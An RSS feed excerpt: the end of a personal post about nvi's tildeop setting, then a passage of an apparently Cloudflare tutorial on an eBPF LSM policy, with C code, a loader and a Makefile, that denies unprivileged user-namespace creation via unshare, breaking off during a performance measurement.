particularly gracefully.&lt;/p&gt;&lt;p&gt;I distinctly remember being asked to create a document when I started working as a Unix Security Analyst in 2002. Being extremely wary of Microsoft products, I created the document in vi on an HP-UX test server I had access to. I then &lt;code&gt;scp&lt;/code&gt;ed the hand-created HTML document from the server onto my Windows 2000 workstation, opened it up in Word, and saved it as a &lt;code&gt;.doc&lt;/code&gt; for others&amp;#39; use. 
(No, we didn&amp;#39;t have any way of creating &lt;code&gt;.PDF&lt;/code&gt;s at that time).&lt;/p&gt;&lt;p&gt;vi/vim was my daily-driver and preferred word-massager from the dawn of the 21st century until now, although I confess with measurable remorse that I did use Microsoft Word a good bit in college from 2013-2017, but I&amp;#39;ve recovered now. 😅&lt;/p&gt;&lt;h3&gt;Slow Progress&lt;/h3&gt;&lt;p&gt;The thing with vim is, its feature list is &lt;em&gt;EXPANSIVE&lt;/em&gt;. That&amp;#39;s not vim&amp;#39;s fault. I wouldn&amp;#39;t ever say it&amp;#39;s too much, but it&amp;#39;s just a lot. It&amp;#39;s also not as easily discoverable as a GUI editor is. You have to do a fair bit of &lt;a href=&quot;https://en.wikipedia.org/wiki/RTFM&quot;&gt;RTFM&lt;/a&gt;, and that&amp;#39;s definitely fair. So, my vim skills largely languished and didn&amp;#39;t really progress beyond the basics for many, many years.&lt;/p&gt;&lt;p&gt;My skills &lt;em&gt;have&lt;/em&gt; grown a fair bit in the last few years thanks to kind friends online (like Hyde) who share tips and tricks, and spur on my desire to learn more, to tweak, to master a skill I find both highly valuable in terms of efficiency, and highly satisfying in terms of enjoyment. With a good text editor (particularly one of the vi-derived ones, in my humble opinion), you don&amp;#39;t feel like you&amp;#39;re trying to select text or move text. It feels like your mind has &lt;em&gt;telekinetic control&lt;/em&gt; over the text on-screen. 
It&amp;#39;s really an amazing feeling.&lt;/p&gt;&lt;h3&gt;Progress Through Regress&lt;/h3&gt;&lt;p&gt;I&amp;#39;m not certain how I came upon this decision or why, but about a week ago, I decided to stop using neovim (an excellent vim fork with a built-in Lua JIT and greater options for macros and customization), and rewind the clock to the mid-1970s by switching my editor to the old-timey &lt;a href=&quot;https://en.wikipedia.org/wiki/Vi_(text_editor)&quot;&gt;vi&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;Or actually, not quite. More like mid-1990s. You see, while the original 1976 vi&amp;#39;s source code is out there and is &lt;a href=&quot;https://rldane.space/what-is-foss.html&quot;&gt;FOSS&lt;/a&gt;, for the longest time it was encumbered by a very restrictive license, because small portions of its code came from the original AT&amp;amp;T Unix. So, even though it was developed at the UC Berkeley &lt;a href=&quot;https://en.wikipedia.org/wiki/CSRG&quot;&gt;CSRG&lt;/a&gt;, it couldn&amp;#39;t be distributed with the freely-available BSDs. Instead Keith Bostic developed &lt;a href=&quot;https://en.wikipedia.org/wiki/Nvi&quot;&gt;nvi&lt;/a&gt; in 1994 to be a very close clone of the original, and &lt;em&gt;that&lt;/em&gt; is the version that has been either pre-installed on, or available for nearly every Linux Distro and BSD variant since the 1990s.&lt;/p&gt;&lt;p&gt;So, I had a certain desire to pare things down and enjoy minimalism a bit more. I recall reading how &lt;a href=&quot;https://en.wikipedia.org/wiki/Rob_Pike&quot;&gt;Rob Pike&lt;/a&gt; decided not to add syntax highlighting to &lt;a href=&quot;https://en.wikipedia.org/wiki/Acme_(text_editor)&quot;&gt;Acme&lt;/a&gt; because it&amp;#39;s &lt;a href=&quot;http://acme.cat-v.org/faq&quot;&gt;distracting&lt;/a&gt;. 
I can&amp;#39;t say for sure if syntax highlighting is distracting or not, given that I&amp;#39;ve enjoyed it for years, going all the way back to Think Pascal for the Macintosh in the very early 1990s, which placed &lt;a href=&quot;https://en.wikipedia.org/wiki/Reserved_word&quot;&gt;reserved words&lt;/a&gt; in boldface. I do think highlighting can be helpful for spotting obvious errors in code (as long as the syntax highlighting is accurate; sometimes it isn&amp;#39;t), but I have been enjoying the exercise of reading code (shell scripts, in my case) more carefully without it, and I think my eye for code is keener for it.&lt;/p&gt;&lt;p&gt;I&amp;#39;ve found the process of &amp;quot;regressing&amp;quot; back to nvi ironically very &lt;em&gt;liberating&lt;/em&gt;, because while it&amp;#39;s more limited than vim, it&amp;#39;s far easier to fully comprehend (understand &lt;em&gt;and&lt;/em&gt; completely wrap your mind around) its feature set vs. something more sophisticated like vim. That makes the experience of learning it a lot less stressful/intimidating. But for its simplicity, &amp;quot;vanilla&amp;quot; vi actually has more features than I ever realized (including multi-level undo!).&lt;/p&gt;&lt;p&gt;The manual page is fairly long (30 pages when converted to PDF), and relatively terse, but still quite doable, and as you start pecking at it over several days to pick up different options and capabilities, a more complete picture of what it can and can&amp;#39;t do begins to develop in your mind.&lt;/p&gt;&lt;h4&gt;The Motion that Changed Everything: &lt;code&gt;~&lt;/code&gt;&lt;/h4&gt;&lt;p&gt;My most recent discovery in nvi (which I now realize also works in vim) is &lt;code&gt;set tildeop&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;The tilde (&lt;code&gt;~&lt;/code&gt;) command in vi/vim is a powerful one because it can reverse the case of the text under the cursor, or the text highlighted. 
Many people have posted their own favorite combination command using the tilde, and the one I used most often was &lt;code&gt;0v$~&lt;/code&gt;, which jumps to the beginning of the line, marks to the end of the line, and toggles the case. This is useful for a variety of reasons, including just &lt;code&gt;ALL CAPS&lt;/code&gt;ing text when you don&amp;#39;t feel like using the dreaded* Caps Lock.&lt;/p&gt;&lt;p&gt;&lt;em&gt;* &amp;quot;Dreaded&amp;quot; for two reasons: one, I swap Caps Lock with Escape on my machines, so it&amp;#39;s a little harder to reach, and two, leaving Caps Lock on and going into command mode in vi can have disastrous and unintended consequences.&lt;/em&gt; 😆&lt;/p&gt;&lt;p&gt;But while &lt;code&gt;0v$~&lt;/code&gt; works well in vim, it doesn&amp;#39;t work in classic vi, because there&amp;#39;s no selection mode (although you can use marks to select a range of lines for certain operations, like &lt;code&gt;:&amp;#39;a,&amp;#39;bs/foo/bar/&lt;/code&gt;). What I found is if you use &lt;code&gt;set tildeop&lt;/code&gt;, the tilde no longer functions as a single-element toggle (in this case, always toggling the case of a single character, because that&amp;#39;s all you can really &amp;quot;select&amp;quot; in classic vi), but a toggle combined with a movement key!&lt;/p&gt;&lt;p&gt;So, while just toggling the case of a single character goes from &lt;code&gt;~&lt;/code&gt; to the slightly more cumbersome &lt;code&gt;~l&lt;/code&gt; (and I will admit to being annoyed at this at times 🙃), toggling the case of a whole word or line is a simple &lt;code&gt;~w&lt;/code&gt; or &lt;code&gt;~$&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;What&amp;#39;s funny is that I just found out that even if you &lt;em&gt;don&amp;#39;t&lt;/em&gt; have &lt;code&gt;tildeop&lt;/code&gt; set, you can still do something simple like &lt;code&gt;0999~&lt;/code&gt;, which will toggle the case of the entire line, as long as it isn&amp;#39;t longer than 999 characters. 
(&lt;em&gt;RTFM folks!&lt;/em&gt; 😂)  &lt;br/&gt;
But I still like being able to combine the tilde with movement characters, so it&amp;#39;s definitely staying. ;)  &lt;br/&gt;
I&amp;#39;ve also discovered that with &lt;code&gt;tildeop&lt;/code&gt; set, a quick &lt;code&gt;~~&lt;/code&gt; will toggle the case of the entire line, so that&amp;#39;s even faster! :D&lt;/p&gt;&lt;h3&gt;Update&lt;/h3&gt;&lt;p&gt;I&amp;#39;ve since found out that I can re-map the backtick key to work as a single-character case toggle (like the tilde key used to work), so now I get the best of both worlds.&lt;/p&gt;&lt;p&gt;Here&amp;#39;s the pertinent part of my &lt;code&gt;.exrc&lt;/code&gt; (should work in &lt;code&gt;.vimrc&lt;/code&gt;/&lt;code&gt;init.vim&lt;/code&gt;, as well):&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;set tildeop
map ` ~l&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content:encoded>
</item>
<item>
<title>Live-patching security vulnerabilities inside the Linux kernel with eBPF Linux Security Module</title>
<link>https://blog.cloudflare.com/live-patch-security-vulnerabilities-with-ebpf-lsm/</link>
<enclosure type="image/jpeg" length="0" url="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1T1WbFDlQxnohg7e9qiK4s/727f5c10f363e77cbbb6c4c29ba495c8/live-patch-security-vulnerabilities-with-ebpf-lsm-0JAtqD.png"></enclosure>
<guid isPermaLink="false">4GuLDoTp-GaY59XDsyEQWfxxUnemfPEUHOXRPA==</guid>
<pubDate>Fri, 19 Jun 2026 10:37:10 +0000</pubDate>
<description>Learn how to patch Linux security vulnerabilities without rebooting the hardware and how to tighten the security of your Linux operating system with eBPF Linux Security Module.</description>
<content:encoded>&lt;p&gt;&lt;a href=&quot;https://www.kernel.org/doc/html/latest/admin-guide/LSM/index.html&quot;&gt;Linux Security Modules&lt;/a&gt; (LSM) is a hook-based framework for implementing security policies and Mandatory Access Control in the Linux kernel. Until recently users looking to implement a security policy had just two options. Configure an existing LSM module such as AppArmor or SELinux, or write a custom kernel module.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.7&quot;&gt;Linux 5.7&lt;/a&gt; introduced a third way: &lt;a href=&quot;https://docs.kernel.org/bpf/prog_lsm.html&quot;&gt;LSM extended Berkeley Packet Filters (eBPF)&lt;/a&gt; (LSM BPF for short). LSM BPF allows developers to write granular policies without configuration or loading a kernel module. LSM BPF programs are verified on load, and then executed when an LSM hook is reached in a call path.&lt;/p&gt;&lt;div&gt;
      &lt;h2&gt;Let’s solve a real-world problem&lt;/h2&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;Modern operating systems provide facilities allowing &amp;quot;partitioning&amp;quot; of kernel resources. For example FreeBSD has &amp;quot;jails&amp;quot;, Solaris has &amp;quot;zones&amp;quot;. Linux is different - it provides a set of seemingly independent facilities each allowing isolation of a specific resource. These are called &amp;quot;namespaces&amp;quot; and have been growing in the kernel for years. They are the base of popular tools like Docker, lxc or firejail. Many of the namespaces are uncontroversial, like the UTS namespace which allows the host system to hide its hostname and domain name. Others are complex but straightforward - NET and NS (mount) namespaces are known to be hard to wrap your head around. Finally, there is this very special very curious USER namespace.&lt;/p&gt;&lt;p&gt;USER namespace is special, since it allows the owner to operate as &amp;quot;root&amp;quot; inside it. How it works is beyond the scope of this blog post; suffice it to say that it is the foundation that lets tools like Docker avoid running as true root, and that makes rootless containers possible.&lt;/p&gt;&lt;p&gt;Due to its nature, allowing unprivileged users access to USER namespace has always carried a great security risk. One such risk is privilege escalation.&lt;/p&gt;&lt;p&gt;Privilege escalation is a &lt;a href=&quot;https://www.cloudflare.com/learning/security/what-is-an-attack-surface/&quot;&gt;common attack surface&lt;/a&gt; for operating systems. One way users may gain privilege is by mapping their namespace to the root namespace via the unshare &lt;a href=&quot;https://en.wikipedia.org/wiki/System_call&quot;&gt;syscall&lt;/a&gt; and specifying the &lt;i&gt;CLONE_NEWUSER&lt;/i&gt; flag. This tells unshare to create a new user namespace with full permissions, and maps the new user and group ID to the previous namespace. 
You can use the &lt;a href=&quot;https://man7.org/linux/man-pages/man1/unshare.1.html&quot;&gt;unshare(1)&lt;/a&gt; program to map root to our original namespace:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;$ id
uid=1000(fred) gid=1000(fred) groups=1000(fred) …
$ unshare -rU
# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
# cat /proc/self/uid_map
         0       1000          1&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In most cases using unshare is harmless, and is intended to run with lower privileges. However, this syscall has been known to be used to &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2022-0492&quot;&gt;escalate privileges&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;Syscalls &lt;i&gt;clone&lt;/i&gt; and &lt;i&gt;clone3&lt;/i&gt; are worth looking into as they also have the ability to &lt;i&gt;CLONE_NEWUSER&lt;/i&gt;. However, for this post we’re going to focus on unshare.&lt;/p&gt;&lt;p&gt;Debian solved this problem with this &lt;a href=&quot;https://sources.debian.org/patches/linux/3.16.56-1+deb8u1/debian/add-sysctl-to-disallow-unprivileged-CLONE_NEWUSER-by-default.patch/&quot;&gt;&amp;quot;add sysctl to disallow unprivileged CLONE_NEWUSER by default&amp;quot;&lt;/a&gt; patch, but it was not mainlined. Another similar patch &lt;a href=&quot;https://lore.kernel.org/all/1453502345-30416-3-git-send-email-keescook@chromium.org/&quot;&gt;&amp;quot;sysctl: allow CLONE_NEWUSER to be disabled&amp;quot;&lt;/a&gt; attempted to mainline, and was met with push back. A critique is the &lt;a href=&quot;https://lore.kernel.org/all/87poq5y0jw.fsf@x220.int.ebiederm.org/&quot;&gt;inability to toggle this feature&lt;/a&gt; for specific applications. In the article “&lt;a href=&quot;https://lwn.net/Articles/673597/&quot;&gt;Controlling access to user namespaces&lt;/a&gt;” the author wrote: “... the current patches do not appear to have an easy path into the mainline.” And as we can see, the patches were ultimately not included in the vanilla kernel.&lt;/p&gt;&lt;div&gt;
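&lt;p&gt;To make the earlier &lt;code&gt;unshare -rU&lt;/code&gt; session more concrete, here is a minimal sketch of roughly what happens at the syscall level: create a user namespace with &lt;i&gt;CLONE_NEWUSER&lt;/i&gt;, then map uid and gid 0 inside it to the caller’s original IDs. The helper name &lt;code&gt;write_file&lt;/code&gt; is our own invention for illustration, and the sketch assumes a kernel that permits unprivileged user namespaces; it is not the actual unshare(1) source.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;#define _GNU_SOURCE
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;sched.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

/* Hypothetical helper: write a short string to an existing file. */
static int write_file(const char *path, const char *buf)
{
    int fd = open(path, O_WRONLY);
    if (fd &amp;lt; 0)
        return -1;
    ssize_t n = write(fd, buf, strlen(buf));
    close(fd);
    return n == (ssize_t) strlen(buf) ? 0 : -1;
}

int main(void)
{
    /* Remember the IDs we hold in the parent namespace. */
    uid_t uid = getuid();
    gid_t gid = getgid();
    char map[64];

    /* Fails (for example with EPERM) when user namespace creation is denied. */
    if (unshare(CLONE_NEWUSER) != 0) {
        perror(&amp;quot;unshare(CLONE_NEWUSER)&amp;quot;);
        return 1;
    }

    /* An unprivileged gid_map write requires setgroups to be denied first.
       The return value is ignored because old kernels lack this file. */
    write_file(&amp;quot;/proc/self/setgroups&amp;quot;, &amp;quot;deny&amp;quot;);

    /* Map ID 0 inside the namespace to our original uid, then gid. */
    snprintf(map, sizeof(map), &amp;quot;0 %u 1&amp;quot;, (unsigned int) uid);
    if (write_file(&amp;quot;/proc/self/uid_map&amp;quot;, map) != 0) {
        perror(&amp;quot;uid_map&amp;quot;);
        return 1;
    }
    snprintf(map, sizeof(map), &amp;quot;0 %u 1&amp;quot;, (unsigned int) gid);
    if (write_file(&amp;quot;/proc/self/gid_map&amp;quot;, map) != 0) {
        perror(&amp;quot;gid_map&amp;quot;);
        return 1;
    }

    printf(&amp;quot;uid inside namespace: %u\n&amp;quot;, (unsigned int) getuid());
    return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Built with a regular C compiler and run as an ordinary user, this should report uid 0 on kernels that allow unprivileged user namespaces. Where creation is blocked, the &lt;i&gt;unshare&lt;/i&gt; call fails and the program exits with an error instead.&lt;/p&gt;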
      &lt;h2&gt;Our solution - LSM BPF&lt;/h2&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;Since upstreaming code that restricts USER namespace seems not to be an option, we decided to use LSM BPF to circumvent these issues. This requires no modifications to the kernel and allows us to express complex rules guarding the access.&lt;/p&gt;&lt;div&gt;
      &lt;h3&gt;Track down an appropriate hook candidate&lt;/h3&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;First, let us track down the syscall we’re targeting. We can find the prototype in the &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/include/linux/syscalls.h#L608&quot;&gt;&lt;i&gt;include/linux/syscalls.h&lt;/i&gt;&lt;/a&gt; file. From there, it’s not as obvious to track down, but the line:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;/* kernel/fork.c */&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Gives us a clue of where to look next in &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/fork.c#L3201&quot;&gt;&lt;i&gt;kernel/fork.c&lt;/i&gt;&lt;/a&gt;. There a call to &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/fork.c#L3082&quot;&gt;&lt;i&gt;ksys_unshare()&lt;/i&gt;&lt;/a&gt; is made. Digging through that function, we find a call to &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/fork.c#L3129&quot;&gt;&lt;i&gt;unshare_userns()&lt;/i&gt;&lt;/a&gt;. This looks promising.&lt;/p&gt;&lt;p&gt;Up to this point, we’ve identified the syscall implementation, but the next question to ask is what hooks are available for us to use? Because we know from the &lt;a href=&quot;https://man7.org/linux/man-pages/man2/unshare.2.html&quot;&gt;man-pages&lt;/a&gt; that unshare is used to mutate tasks, we look at the task-based hooks in &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/include/linux/lsm_hooks.h#L605&quot;&gt;&lt;i&gt;include/linux/lsm_hooks.h&lt;/i&gt;&lt;/a&gt;. Back in the function &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/user_namespace.c#L171&quot;&gt;&lt;i&gt;unshare_userns()&lt;/i&gt;&lt;/a&gt; we saw a call to &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/cred.c#L252&quot;&gt;&lt;i&gt;prepare_creds()&lt;/i&gt;&lt;/a&gt;. 
This looks very similar to the &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/include/linux/lsm_hooks.h#L624&quot;&gt;&lt;i&gt;cred_prepare&lt;/i&gt;&lt;/a&gt; hook. To verify the match, we look inside &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/cred.c#L291&quot;&gt;&lt;i&gt;prepare_creds()&lt;/i&gt;&lt;/a&gt; and see a call to the security hook &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/security/security.c#L1706&quot;&gt;&lt;i&gt;security_prepare_creds()&lt;/i&gt;&lt;/a&gt;, which ultimately calls the hook:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;…
rc = call_int_hook(cred_prepare, 0, new, old, gfp);
…&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Without going much further down this rabbithole, we know this is a good hook to use because &lt;i&gt;prepare_creds()&lt;/i&gt; is called right before &lt;i&gt;create_user_ns()&lt;/i&gt; in &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/user_namespace.c#L181&quot;&gt;&lt;i&gt;unshare_userns()&lt;/i&gt;&lt;/a&gt; which is the operation we’re trying to block.&lt;/p&gt;&lt;div&gt;
      &lt;h3&gt;LSM BPF solution&lt;/h3&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;We’re going to compile with the &lt;a href=&quot;https://nakryiko.com/posts/bpf-core-reference-guide/#defining-own-co-re-relocatable-type-definitions&quot;&gt;eBPF compile once-run everywhere (CO-RE)&lt;/a&gt; approach. This allows us to compile on one architecture and load on another. But we’re going to target x86_64 specifically. LSM BPF for ARM64 is still in development, and the following code will not run on that architecture. Watch the &lt;a href=&quot;https://lore.kernel.org/bpf/&quot;&gt;BPF mailing list&lt;/a&gt; to follow the progress.&lt;/p&gt;&lt;p&gt;This solution was tested on kernel versions &amp;gt;= 5.15 configured with the following:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;BPF_EVENTS
BPF_JIT
BPF_JIT_ALWAYS_ON
BPF_LSM
BPF_SYSCALL
BPF_UNPRIV_DEFAULT_OFF
DEBUG_INFO_BTF
DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT
DYNAMIC_FTRACE
FUNCTION_TRACER
HAVE_DYNAMIC_FTRACE&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;A boot option &lt;code&gt;lsm=bpf&lt;/code&gt; may be necessary if &lt;code&gt;CONFIG_LSM&lt;/code&gt; does not contain “bpf” in the list.&lt;/p&gt;&lt;p&gt;Let’s start with our preamble:&lt;/p&gt;&lt;p&gt;&lt;i&gt;deny_unshare.bpf.c&lt;/i&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;linux/capability.h&amp;gt;
#include &amp;lt;linux/errno.h&amp;gt;
#include &amp;lt;linux/sched.h&amp;gt;
#include &amp;lt;linux/types.h&amp;gt;

#include &amp;lt;bpf/bpf_tracing.h&amp;gt;
#include &amp;lt;bpf/bpf_helpers.h&amp;gt;
#include &amp;lt;bpf/bpf_core_read.h&amp;gt;

#define X86_64_UNSHARE_SYSCALL 272
#define UNSHARE_SYSCALL X86_64_UNSHARE_SYSCALL&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Next we set up our necessary structures for CO-RE relocation in the following way:&lt;/p&gt;&lt;p&gt;&lt;i&gt;deny_unshare.bpf.c&lt;/i&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;…

typedef unsigned int gfp_t;

struct pt_regs {
	long unsigned int di;
	long unsigned int orig_ax;
} __attribute__((preserve_access_index));

typedef struct kernel_cap_struct {
	__u32 cap[_LINUX_CAPABILITY_U32S_3];
} __attribute__((preserve_access_index)) kernel_cap_t;

struct cred {
	kernel_cap_t cap_effective;
} __attribute__((preserve_access_index));

struct task_struct {
    unsigned int flags;
    const struct cred *cred;
} __attribute__((preserve_access_index));

char LICENSE[] SEC(&amp;quot;license&amp;quot;) = &amp;quot;GPL&amp;quot;;

…&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We don’t need to fully flesh out the structs; we only need the minimum information the program requires to function. CO-RE will do whatever is necessary to perform the relocations for your kernel. This makes writing the LSM BPF programs easy!&lt;/p&gt;&lt;p&gt;&lt;i&gt;deny_unshare.bpf.c&lt;/i&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;SEC(&amp;quot;lsm/cred_prepare&amp;quot;)
int BPF_PROG(handle_cred_prepare, struct cred *new, const struct cred *old,
             gfp_t gfp, int ret)
{
    struct pt_regs *regs;
    struct task_struct *task;
    kernel_cap_t caps;
    int syscall;
    unsigned long flags;

    // If previous hooks already denied, go ahead and deny this one
    if (ret) {
        return ret;
    }

    task = bpf_get_current_task_btf();
    regs = (struct pt_regs *) bpf_task_pt_regs(task);
    // On x86_64, orig_ax holds the syscall number
    syscall = regs-&amp;gt;orig_ax;
    caps = task-&amp;gt;cred-&amp;gt;cap_effective;

    // Only process UNSHARE syscall, ignore all others
    if (syscall != UNSHARE_SYSCALL) {
        return 0;
    }

    // PT_REGS_PARM1_CORE pulls the first parameter passed into the unshare syscall
    flags = PT_REGS_PARM1_CORE(regs);

    // Ignore any unshare that does not have CLONE_NEWUSER
    if (!(flags &amp;amp; CLONE_NEWUSER)) {
        return 0;
    }

    // Allow tasks with CAP_SYS_ADMIN to unshare (already root)
    if (caps.cap[CAP_TO_INDEX(CAP_SYS_ADMIN)] &amp;amp; CAP_TO_MASK(CAP_SYS_ADMIN)) {
        return 0;
    }

    return -EPERM;
}&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Creating the program is the first step; the second is loading it and attaching it to our desired hook. There are several ways to do this: the &lt;a href=&quot;https://github.com/cilium/ebpf&quot;&gt;Cilium ebpf&lt;/a&gt; project, the &lt;a href=&quot;https://github.com/libbpf/libbpf-rs&quot;&gt;Rust bindings&lt;/a&gt;, and several others listed on the &lt;a href=&quot;https://ebpf.io/projects/&quot;&gt;ebpf.io&lt;/a&gt; project landscape page. We’re going to use native libbpf.&lt;/p&gt;&lt;p&gt;&lt;i&gt;deny_unshare.c&lt;/i&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;#include &amp;lt;bpf/libbpf.h&amp;gt;
#include &amp;lt;stdarg.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;
#include &amp;quot;deny_unshare.skel.h&amp;quot;

static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
{
    return vfprintf(stderr, format, args);
}

int main(int argc, char *argv[])
{
    struct deny_unshare_bpf *skel;
    int err;

    libbpf_set_strict_mode(LIBBPF_STRICT_ALL);
    libbpf_set_print(libbpf_print_fn);

    // Loads and verifies the BPF program
    skel = deny_unshare_bpf__open_and_load();
    if (!skel) {
        fprintf(stderr, &amp;quot;failed to load and verify BPF skeleton\n&amp;quot;);
        err = 1; // err is otherwise uninitialized on this path
        goto cleanup;
    }

    // Attaches the loaded BPF program to the LSM hook
    err = deny_unshare_bpf__attach(skel);
    if (err) {
        fprintf(stderr, &amp;quot;failed to attach BPF skeleton\n&amp;quot;);
        goto cleanup;
    }

    printf(&amp;quot;LSM loaded! ctrl+c to exit.\n&amp;quot;);

    // The BPF link is not pinned, so exiting removes the program
    for (;;) {
        fprintf(stderr, &amp;quot;.&amp;quot;);
        sleep(1);
    }

cleanup:
    deny_unshare_bpf__destroy(skel);
    return err;
}&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Lastly, to compile, we use the following Makefile:&lt;/p&gt;&lt;p&gt;&lt;i&gt;Makefile&lt;/i&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-makefile&quot;&gt;CLANG ?= clang-13
LLVM_STRIP ?= llvm-strip-13
ARCH := x86
INCLUDES := -I/usr/include -I/usr/include/x86_64-linux-gnu
LIBS_DIR := -L/usr/lib/lib64 -L/usr/lib/x86_64-linux-gnu
LIBS := -lbpf -lelf

.PHONY: all clean run

all: deny_unshare.skel.h deny_unshare.bpf.o deny_unshare

run: all
	sudo ./deny_unshare

clean:
	rm -f *.o
	rm -f deny_unshare.skel.h

#
# BPF is kernel code. We need to pass -D__KERNEL__ to refer to fields present
# in the kernel version of pt_regs struct. uAPI version of pt_regs (from ptrace)
# has different field naming.
# See: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fd56e0058412fb542db0e9556f425747cf3f8366
#
deny_unshare.bpf.o: deny_unshare.bpf.c
	$(CLANG) -g -O2 -Wall -target bpf -D__KERNEL__ -D__TARGET_ARCH_$(ARCH) $(INCLUDES) -c $&amp;lt; -o $@
	$(LLVM_STRIP) -g $@ # Removes debug information

deny_unshare.skel.h: deny_unshare.bpf.o
	sudo bpftool gen skeleton $&amp;lt; &amp;gt; $@

deny_unshare: deny_unshare.c deny_unshare.skel.h
	$(CC) -g -Wall -c $&amp;lt; -o $@.o
	$(CC) -g -o $@ $(LIBS_DIR) $@.o $(LIBS)

.DELETE_ON_ERROR:&lt;/code&gt;&lt;/pre&gt;&lt;div&gt;
      &lt;h3&gt;Result&lt;/h3&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;In a new terminal window, run:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;$ make run
…
LSM loaded! ctrl+c to exit.&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In another terminal window, we’re successfully blocked!&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;$ unshare -rU
unshare: unshare failed: Cannot allocate memory
$ id
uid=1000(fred) gid=1000(fred) groups=1000(fred) …&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The policy also always lets privileged callers through:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;$ sudo unshare -rU
# id
uid=0(root) gid=0(root) groups=0(root)&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In the unprivileged case, the syscall aborts early. What is the performance impact in the privileged case?&lt;/p&gt;&lt;div&gt;
      &lt;h3&gt;Measure performance&lt;/h3&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;For the measurements, we’ll use a one-line unshare that maps the user namespace and executes a command inside it:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;$ unshare -frU --kill-child -- bash -c &amp;quot;exit 0&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We’ll measure, in CPU cycles, the time between entering and exiting the unshare syscall as the root user in two cases:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Command run without the policy&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Command run with the policy&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;We’ll record the measurements with &lt;a href=&quot;https://docs.kernel.org/trace/ftrace.html&quot;&gt;ftrace&lt;/a&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;$ sudo su
# cd /sys/kernel/debug/tracing
# echo 1 &amp;gt; events/syscalls/sys_enter_unshare/enable ; echo 1 &amp;gt; events/syscalls/sys_exit_unshare/enable&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;At this point, we’ve enabled tracing of syscall entry and exit for unshare specifically. Now we set the trace clock so that the timestamps count CPU cycles:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;# echo &amp;#39;x86-tsc&amp;#39; &amp;gt; trace_clock&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Next, we begin our measurements:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;# unshare -frU --kill-child -- bash -c &amp;quot;exit 0&amp;quot; &amp;amp;
